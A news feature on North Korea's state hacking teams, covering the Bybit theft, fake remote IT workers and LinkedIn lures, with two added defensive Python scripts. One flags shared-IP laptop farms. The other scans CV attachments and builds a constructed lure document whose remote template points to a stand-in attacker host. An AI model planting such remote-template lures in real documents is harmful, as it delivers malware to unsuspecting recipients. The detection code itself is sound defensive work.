How hermit kingdom North Korea became a hacking superpower

Yahoo, 07-04-2025

At first glance, 'Matt' looks like the perfect solution to your firm's evolving IT needs. He's worked for a small software outfit, and has a CV that suggests he is both a self-starter and a team player. He performs well in a Zoom interview, and soon gets hired, working from home on those late shifts that nobody else wants to do.
It's only a few weeks in, when your firm suffers a ransomware attack, that Matt's true nature as a 'team player' is revealed. For his real boss is the government of North Korea, where he's part of an elite team of state-trained hackers. The software firm that gave him glowing references was a fake, as was his job interview – courtesy of AI software that relayed a video image of someone else entirely.
Luckily, your firm is insured for cyberattacks, and in return for £1 million, Matt agrees not to wipe all your data. But not everyone who falls foul of North Korea's hackers gets away so lightly – as proved by February's catastrophic attack on the Dubai-based cryptocurrency exchange Bybit.
In a raid thought to have employed similar methods to the fictional scenario outlined above, a team from Pyongyang made off with $1.5bn (£1.2bn), the largest heist in criminal history. The loot totalled nearly 50 times the £26 million stolen in London's Brink's-Mat robbery in 1983, and more, even, than Brad Pitt and George Clooney pinch in all three Ocean's movies combined.
Indeed, the exploits of the Lazarus Group, as Pyongyang's cybercriminals are known, could generate a movie franchise in themselves. In 2016, they masterminded the Bangladesh Bank heist, in which nearly $100m was stolen via the SWIFT international payment system.
The following year came the global WannaCry attack, infiltrating out-of-date Windows systems in some 150 countries, including many used by Britain's NHS. It would, however, be a brave Hollywood film-maker who took on the Lazarus biopic. The group is most notorious for its attack on Sony Pictures in 2014, when it hacked the emails of the movie bosses behind The Interview, a film lampooning North Korean leader Kim Jong-Un.
Lazarus's prowess is all the more remarkable, given North Korea's reputation as a backward, Stalinist state. In a land where most people do not have a dumbphone, let alone an internet connection (a privilege limited to a few thousand high-ranking officials), where does one find computer-literate people? And how, in turn, do they develop into some of the best hackers in the world, capable of plundering hundreds of millions of dollars' worth of loot every year? After all, Bybit was not some time-warped backwater of Britain's health service, but the world's second largest cryptocurrency exchange, which prided itself on 'industry-leading security measures'.
To trace the answer, one has to go back to the late 1990s, when a shy adolescent North Korean student enrolled at a posh boarding school in Switzerland, telling other pupils he was a Pyongyang diplomat's son. In fact, it was a teenage Kim Jong Un, sent there secretly by his father, then-North Korean Supreme Leader Kim Jong-Il, to learn about life outside the hermit kingdom.
He was, by all accounts, an unremarkable student, spending much of his time playing video games. But one thing he did pick up was an acute awareness of how central computers were becoming to modern life. And when he and his brother, Kim Jong Chul, returned home a few years later, that lesson was duly passed on.
'They were the ones who enlightened their father,' says Thae Yong Ho, Pyongyang's former ambassador to London, who defected to South Korea in 2016. 'Kim Jong Il quickly caught the advantages of these computers and networking.'
This was not so that North Korea's population could enjoy the mind-broadening benefits of the 'information superhighway', as it was then known. Kim Jong Il, Thae says, saw computerisation purely as a 'more efficient' way to run his police state, and soon set up specialist schools devoted to hi-tech espionage and cyber-warfare. These gathered pace when Kim Jong-Un took over after his father's death in 2011, and paid handsome dividends five years later, when hackers stole top-secret military plans from South Korea. The documents included a scenario for how a feared war with the South's northern neighbour might play out, and a plan to 'decapitate' North Korea by assassinating Kim Jong Un.
But what began as an instrument for self-preservation has increasingly become one for self-enrichment. With North Korea's economy on its knees because of sanctions on its nuclear weapons program, Lazarus's ill-gotten gains are now a vital source of revenue.
It's also more efficient than previous regime scams, such as exporting crystal meth and getting embassies to use their diplomatic immunity for smuggling. In 2023, a UN monitoring body reported that cyber-theft accounted for half of the state's total foreign-currency revenue. The majority of the proceeds are thought to be spent on its weapons programme.
Today, North Korea's cyber-army is thought to be more than 8,000-strong, most of them talented maths students cherry-picked from school. Within North Korea they operate under the innocuous-sounding Reconnaissance General Bureau; the names under which Western governments and security researchers track their operations include Lazarus, BeagleBoyz, Hidden Cobra and APT38 (the 'APT' stands for 'advanced persistent threat').
The system used to recruit them bears similarities to that used by the Soviets to hone athletes and chess prodigies during the Cold War, marked by long, gruelling hours of work, often away from family. There is precious little personal choice to exercise in North Korea, after all, but in return for service in what Kim Jong-Un refers to as his 'all-purpose sword' – gathering intel, waging cyberwarfare and raking in stolen funds – they get certain privileges.
These include exemption from service in state-run labour programs, material benefits such as cars and comfortable homes, and rare opportunities to travel abroad, such as to global maths contests like the International Mathematical Olympiad.
The Olympiad tests creative problem-solving in pure maths, setting unfamiliar problems that yield to no memorised method, which is just the kind of lateral thinking required for hacking. North Korean contestants have consistently ranked in the top five in the contest and, true to form for hackers, have twice been caught cheating.
Yet it's not simply their hot-housed technical expertise that makes them so effective. For just as bank robbers often use insiders who know an institution's weak spots, most cyber-heists exploit human weakness, be it sending out 'phishing' emails, or befriending employees to fool them into divulging a password. Known in the trade as 'social engineering' – cybercrime-speak for an old-fashioned confidence trick – this is where disciplined North Koreans can be far more effective than the average private criminal gang.
'It really comes down to persistence,' says Sarah Kern, North Korea expert at US cyber-security firm SecureWorks. 'The North Koreans will carry out social engineering conversations and relationships over months or even longer, building a rapport with potential targets so that they will trust them enough to open a link with something malicious in it.'
This appears to be the technique used in the Bybit attack, which targeted the firm's third-party 'cold wallet' service, a secure storage facility that holds cryptocurrency offline. To draw a conventional banking analogy, this is the rough equivalent of a vault from which bank tellers make periodic withdrawals to replenish their day-to-day trading stocks. According to reports, the attackers used social engineering to compromise the computers used to operate the cold wallet ahead of a withdrawal by Bybit's executives. So when the executives signed off the transfer, the funds were diverted to the hackers instead.
Bybit has not disclosed the hackers' exact method. But in the hyper-online crypto-currency world – where many people go by pseudonyms anyway – it's not hard for Lazarus operatives to make friends. Kern, for example, says they will infiltrate online communities of blockchain engineers and software developers, slowly building up relationships. Hackers also rely on flattery, according to Jake Moore, a former police cybersecurity expert who works for European cybersecurity firm ESET. One tactic is to pose as online head-hunters on LinkedIn, approaching software developers with lucrative salary offers.
'They will tell someone they have the skill set for a very good job, then invite them for a quick online interview where they might disclose all kinds of info about the software programs they're currently using – stuff they'd never otherwise volunteer,' he says. 'At that point they might also be asked to click on an online job application form with malware in it. Another approach is to pose as a TV firm asking for an interview – anything that gets the target excited, and distracted from the usual security protocols.'
This, again, is what apparently happened at Bybit, whose third-party cold wallet provider has reportedly blamed a Lazarus sub-group that the FBI tracks as TraderTraitor, which specifically targets cryptocurrency employees. According to the FBI, which first put out a warning about TraderTraitor in 2022, the group 'offers high-paying jobs to entice the recipients to download malware-laced cryptocurrency applications'.
So what will happen to the proceeds of Lazarus's $1.5bn heist? Unfortunately for Bybit, the deregulated nature of cryptocurrency makes it all too easy to launder funds. Within minutes of the heist, the hackers were feeding the funds through networks of other exchanges and wallets, attempting to hide their origins.
Experts say the North Koreans are particularly good at this, with some suggesting they are the 'most sophisticated crypto launderers' ever, scooping up, on average, some 90 per cent of the funds they successfully target.
While some more reputable exchanges agreed to Bybit's requests to freeze the stolen funds, others have declined, meaning only a fraction is likely to be recovered. Networks of local fixers worldwide will already be laundering the money into legitimate banks, businesses and property investments, proceeds of which then ultimately filter back to Pyongyang. Some of this is thought to be done through China, which has long turned a blind eye to its neighbour's rackets.
Bybit is trying to make that process as hard as possible, courtesy of its new 'Lazarus Bounty' programme, whereby online sleuths who help trace the stolen funds get 10 per cent of anything recovered.
Yet not all of Lazarus's hacking activity is about large-scale theft. Last year, US prosecutors warned that thousands of North Korean hackers were obtaining high-paid jobs as remote-working IT experts in the US and Europe, taking advantage of the fact that in today's globalised, work-from-home business environment, many employees never set foot in a company office. Prosecutors indicted 14 North Koreans who, they said, posed online as US citizens to apply for tech jobs, and the US government offered a reward of up to $5m for information on them.
Some even got real-life US accomplices to pose in the job interviews for them, who'd then get company laptops sent to their home addresses. While the purpose of the attacks appeared to be simply to earn a regular paycheck – some jobs paid $300,000 per year – the hackers would often terminate their employment with a ransomware attack. Meanwhile, they were also gaining invaluable real-world experience of how US firms' tech systems operate.
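The 'laptop sent to an accomplice's home' pattern leaves a trace an employer can look for: several supposedly unrelated remote employees whose company devices all check in from the same residential IP, or whose logins geolocate somewhere other than the region on file with HR. The following Python is an added example, not part of the article; the VPN check-in lines, the HR location table and the list of corporate egress addresses are all constructed for it.

```python
"""Detection sketch for the remote-worker fraud pattern: several
'employees' whose company laptops all check in from one residential
address (a facilitator's laptop farm), or whose logins geolocate
somewhere other than where HR believes they live.

Added example, stdlib only. Log lines, HR table and egress allowlist
are constructed, not real data."""
from __future__ import annotations

import re
from collections import defaultdict

# Corporate egress / VPN concentrator addresses behind which many users
# legitimately share one public IP (constructed).
KNOWN_EGRESS = {"203.0.113.10"}

# Region each employee declared at hiring (constructed HR export).
HR_LOCATION = {
    "asmith": "US-TX",
    "bjones": "US-CA",
    "clee": "US-NY",
    "dkhan": "US-WA",
    "emiller": "US-IL",
}

# Constructed endpoint check-in lines: three different 'employees' arrive
# from one residential IP in Texas; two of them told HR they live elsewhere.
LOG_LINES = """\
2025-03-03T14:02:11Z user=asmith device=LT-0417 src=198.51.100.23 geo=US-TX
2025-03-03T14:05:40Z user=bjones device=LT-0522 src=198.51.100.23 geo=US-TX
2025-03-03T14:07:02Z user=clee device=LT-0531 src=198.51.100.23 geo=US-TX
2025-03-03T15:11:57Z user=dkhan device=LT-0601 src=192.0.2.77 geo=US-WA
2025-03-03T16:20:09Z user=emiller device=LT-0612 src=203.0.113.10 geo=US-IL
2025-03-03T16:21:33Z user=dkhan device=LT-0601 src=203.0.113.10 geo=US-IL
2025-03-04T02:45:00Z user=asmith device=LT-0417 src=198.51.100.23 geo=US-TX
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) user=(?P<user>\S+) device=(?P<device>\S+) "
    r"src=(?P<src>\S+) geo=(?P<geo>\S+)$"
)


def parse_log(text: str) -> list[dict[str, str]]:
    """Parse check-in lines into dicts; malformed lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            events.append(m.groupdict())
    return events


def find_shared_ips(events, min_users: int = 2, known_egress=KNOWN_EGRESS):
    """Map each non-corporate source IP to the distinct users whose devices
    checked in from it, keeping only IPs shared by at least min_users."""
    users_by_ip: dict[str, set[str]] = defaultdict(set)
    for ev in events:
        if ev["src"] not in known_egress:
            users_by_ip[ev["src"]].add(ev["user"])
    return {ip: users for ip, users in users_by_ip.items() if len(users) >= min_users}


def find_location_mismatches(events, hr=HR_LOCATION, known_egress=KNOWN_EGRESS):
    """Users whose check-in geolocation disagrees with the region they declared
    to HR. Corporate egress is skipped: its geolocation reflects the office,
    not the employee. One finding per (user, source IP) pair."""
    seen: set[tuple[str, str]] = set()
    mismatches = []
    for ev in events:
        declared = hr.get(ev["user"])
        if ev["src"] in known_egress or declared is None:
            continue
        if ev["geo"] != declared and (ev["user"], ev["src"]) not in seen:
            seen.add((ev["user"], ev["src"]))
            mismatches.append((ev["user"], declared, ev["src"], ev["geo"]))
    return mismatches


def triage(text: str) -> dict:
    """Run both checks over a log and return the findings together."""
    events = parse_log(text)
    return {
        "shared_ips": find_shared_ips(events),
        "location_mismatches": find_location_mismatches(events),
    }


if __name__ == "__main__":
    result = triage(LOG_LINES)
    for ip, users in result["shared_ips"].items():
        print(f"[laptop-farm?] {ip} used by {len(users)} users: {sorted(users)}")
    for user, declared, src, geo in result["location_mismatches"]:
        print(f"[location] {user} declared {declared}, seen from {src} ({geo})")
```

A shared IP is only suspicious once corporate NAT, VPN concentrators and known coworking spaces have been excluded, which is what the egress allowlist is for, and the geolocation check needs the region the employee declared to HR rather than the address on the laptop's shipping label. Either finding is a prompt for a live video check-in and a look at the device for remote-access software, not proof of fraud on its own.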
Alarmingly for the UK, meanwhile, it was reported this week that North Koreans are increasingly infiltrating British companies by posing as remote employees. IT staff from the country have been hired for a number of web development and artificial intelligence projects, researchers at Google found, potentially aided by local facilitators.
For employers who think this kind of thing will never happen to them, Moore has a salutary tale about a 'social engineering' experiment he set up for a UK law firm that he advised. He created a fake online profile for 'Jessica', a young (and attractive) female law graduate, who messaged the firm's 100 employees via LinkedIn seeking work. Would they mind if she emailed them her CV?
'There was a piece of malware buried inside the CV, which would have given a real life hacker a way in,' says Moore. 'Most of the firm didn't fall for it, but three of them did, and even asked if she'd like to meet up for a drink. It's easier for hackers to operate than people think.'
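Moore's 'Jessica' test works because a CV arrives as a document people expect to open. Before such a file reaches a mailbox it can be checked for the mechanisms a lure of that kind would need. The following Python is an added example, not Moore's tooling and not anything from the article: it inspects a .docx package (a zip of XML parts) for VBA macros, embedded OLE objects, executables smuggled in as package members and remote-template injection, and builds two constructed sample documents, one clean and one lure, to run against. The hostnames inside them are made up.

```python
"""Static triage of an inbound Office Open XML 'CV' attachment for the
delivery tricks a lure would rely on: VBA macros, embedded OLE objects,
executables hidden as package members, and a remote template (external
relationship) that fetches code when the document is opened.

Added example, stdlib only. Both sample documents are constructed
inline; neither is a real lure."""
from __future__ import annotations

import io
import re
import xml.etree.ElementTree as ET
import zipfile

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OD_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
MACRO_CT = "application/vnd.ms-word.document.macroEnabled.main+xml"
# External relationship types that are normal on their own (a web link in the
# text) and are not a delivery mechanism by themselves.
BENIGN_EXTERNAL = ("/hyperlink",)
EXEC_EXT = re.compile(r"\.(exe|dll|scr|js|vbs|hta|lnk|ps1)$", re.I)


def scan_docx(data: bytes) -> list[str]:
    """Return human-readable indicators found in the package; [] if clean."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return ["not-ooxml: attachment is not a zip package"]
    findings: list[str] = []
    names = zf.namelist()

    for name in names:
        if name.lower().endswith("vbaproject.bin"):
            findings.append(f"macro: {name}")
        elif name.startswith("word/embeddings/"):
            findings.append(f"embedded-object: {name}")
        elif EXEC_EXT.search(name):
            findings.append(f"executable-member: {name}")

    if "[Content_Types].xml" in names:
        if MACRO_CT in zf.read("[Content_Types].xml").decode("utf-8", "replace"):
            findings.append("macro-enabled content type declared")

    # *.rels parts declare every link between parts. An External target on
    # anything but a hyperlink means Word reaches outside the file on open;
    # an attachedTemplate pointing at a URL is the remote-template trick.
    for name in names:
        if not name.endswith(".rels"):
            continue
        root = ET.fromstring(zf.read(name))
        for rel in root.iter(f"{{{REL_NS}}}Relationship"):
            rtype = rel.get("Type", "")
            if rel.get("TargetMode") != "External" or rtype.endswith(BENIGN_EXTERNAL):
                continue
            kind = rtype.rsplit("/", 1)[-1]
            findings.append(f"external-{kind}: {name} -> {rel.get('Target')}")
    return findings


def build_docx(parts: dict[str, str | bytes]) -> bytes:
    """Zip a dict of part-name -> content into an OOXML-style package."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, body in parts.items():
            zf.writestr(name, body)
    return buf.getvalue()


_CT = ('<?xml version="1.0" encoding="UTF-8"?>'
       '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
       '<Override PartName="/word/document.xml" ContentType="%s"/></Types>')
CLEAN_CT = _CT % "application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"
LURE_CT = _CT % MACRO_CT
_RELS = f'<?xml version="1.0" encoding="UTF-8"?><Relationships xmlns="{REL_NS}">%s</Relationships>'
DOC_RELS = _RELS % (
    f'<Relationship Id="rId1" Type="{OD_REL}settings" Target="settings.xml"/>'
    f'<Relationship Id="rId2" Type="{OD_REL}hyperlink" '
    'Target="https://portfolio.example/jessica" TargetMode="External"/>')
# Remote template injection: settings.xml's relationships point at a .dotm on
# an attacker-controlled host (constructed hostname).
LURE_SETTINGS_RELS = _RELS % (
    f'<Relationship Id="rId1" Type="{OD_REL}attachedTemplate" '
    'Target="http://cv-hosting.example/cv.dotm" TargetMode="External"/>')
DOC_XML = ('<?xml version="1.0"?><w:document xmlns:w="http://schemas.openxmlformats.org/'
           'wordprocessingml/2006/main"><w:body/></w:document>')

CLEAN_CV = build_docx({
    "[Content_Types].xml": CLEAN_CT,
    "word/document.xml": DOC_XML,
    "word/_rels/document.xml.rels": DOC_RELS,
})
LURE_CV = build_docx({
    "[Content_Types].xml": LURE_CT,
    "word/document.xml": DOC_XML,
    "word/_rels/document.xml.rels": DOC_RELS,
    "word/_rels/settings.xml.rels": LURE_SETTINGS_RELS,
    "word/vbaProject.bin": b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 8,  # OLE header stub
})

if __name__ == "__main__":
    for label, doc in (("clean", CLEAN_CV), ("lure", LURE_CV)):
        print(label, scan_docx(doc) or ["no indicators"])
```

The check is deliberately static: it never opens the document in Word, so it cannot be exploited by the file it inspects. It will not catch a CV that is clean but carries a link to a credential-phishing page, which is why the human 'would they open it' test Moore ran still matters.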